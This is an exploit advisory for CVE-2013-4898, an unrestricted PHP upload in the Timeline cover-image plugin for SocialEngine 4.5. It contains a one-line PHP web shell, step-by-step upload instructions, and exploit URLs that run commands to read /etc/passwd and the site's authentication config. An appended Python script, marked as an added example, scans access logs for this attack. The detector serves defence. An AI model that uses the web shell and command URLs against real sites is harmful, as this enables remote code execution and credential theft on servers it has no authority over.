# Exploit Title: Sending php file in the timeline plugin cover image of SocialEngine 4.5
# Date: 2013-08-17
# Discovered by: Wesley Henrique Leite aka "spyk2r"
# Vendor Homepage: http://webhive.com.ua/
# Software Link: http://webhive.com.ua/store/product.php?id_product=46
# Version: plugin Timeline 4.2.5p9 for SocialEngine 4.5
# Vendor Notified: 2013-08-17
# CVE Notified: 2013-08-24
# CVE : CVE-2013-4898

+ INTRODUCTION

The plugin aims to give the user profile a better look: it allows adding a
cover image, keeping the layout close to the style of modern social networks,
among other features.

+ DESCRIPTION OF VULNERABILITY

While logged in, open the profile page of your own user [my profile]:

http://[url]/index.php/profile/[profile-name]

>> Click "Change Cover"

>> Click "Upload Cover"

Select the "*.php" file you want to upload.

//### Example PHP file to send "inject.php" ###
<?php echo system("$_GET['cmd']"); ?>
//###

After the file is selected and uploaded, it is written to a temporary area.
The system detects that the format is not valid, but it does not remove the
file, which allows it to be accessed later.

An error message is displayed on the screen:

[ File "/srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php"
is not an image or does not exist ]

+ ACCESS

/srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php

The important part is the path from "public" onward: since that directory is
served by the web server, it gives us access to our file.

http://[url]/public/temporary/timeline/cover_original_8.php?cmd=cat%20/etc/passwd

http://[url]/public/temporary/timeline/cover_original_8.php?cmd=cat%20../../../install/config/auth.php
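As an added example, not part of the advisory, the following check lets a defender scan web-server access logs for the trace this bug leaves: requests that execute a script from the plugin's temporary upload directory. The sample log lines, the UPLOAD_DIRS tuple and the find_script_hits function are constructed assumptions, not code from SocialEngine or the Timeline plugin.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/nginx combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [17/Aug/2013:10:01:02 +0000] "GET /index.php/profile/alice HTTP/1.1" 200 5120
203.0.113.7 - - [17/Aug/2013:10:01:40 +0000] "GET /public/temporary/timeline/cover_original_8.jpg HTTP/1.1" 200 20480
203.0.113.7 - - [17/Aug/2013:10:02:15 +0000] "GET /public/temporary/timeline/cover_original_8.php?cmd=id HTTP/1.1" 200 77
203.0.113.7 - - [17/Aug/2013:10:02:31 +0000] "GET /public/temporary/timeline/cover_original_9.phtml HTTP/1.1" 200 12
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Web-exposed staging directory named in the advisory (assumed; extend per deployment).
UPLOAD_DIRS = ("/public/temporary/",)
# Extensions the web server would hand to the PHP interpreter.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)


def find_script_hits(log_text):
    """Return one finding per request for a script file under an upload directory.

    Image requests from the same directory are normal and are ignored; only
    script extensions matter, since a rejected upload that is never deleted is
    only dangerous if the server will execute it.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real deployment would count these
        parts = urlsplit(m.group("target"))
        if not parts.path.startswith(UPLOAD_DIRS) or not SCRIPT_EXT.search(parts.path):
            continue
        findings.append({
            "ip": m.group("ip"),
            "timestamp": m.group("ts"),
            "path": parts.path,
            "params": parse_qs(parts.query),  # e.g. the cmd parameter the shell reads
            "status": int(m.group("status")),  # 200 means the server executed it
        })
    return findings


if __name__ == "__main__":
    for hit in find_script_hits(SAMPLE_LOG):
        print(hit)
```

Requests for the temporary directory that succeed with a script extension and a status 200 are the signal to hunt on; an upload handler that deleted rejected files, or a web-server rule refusing to execute anything under public/temporary, would remove the condition entirely.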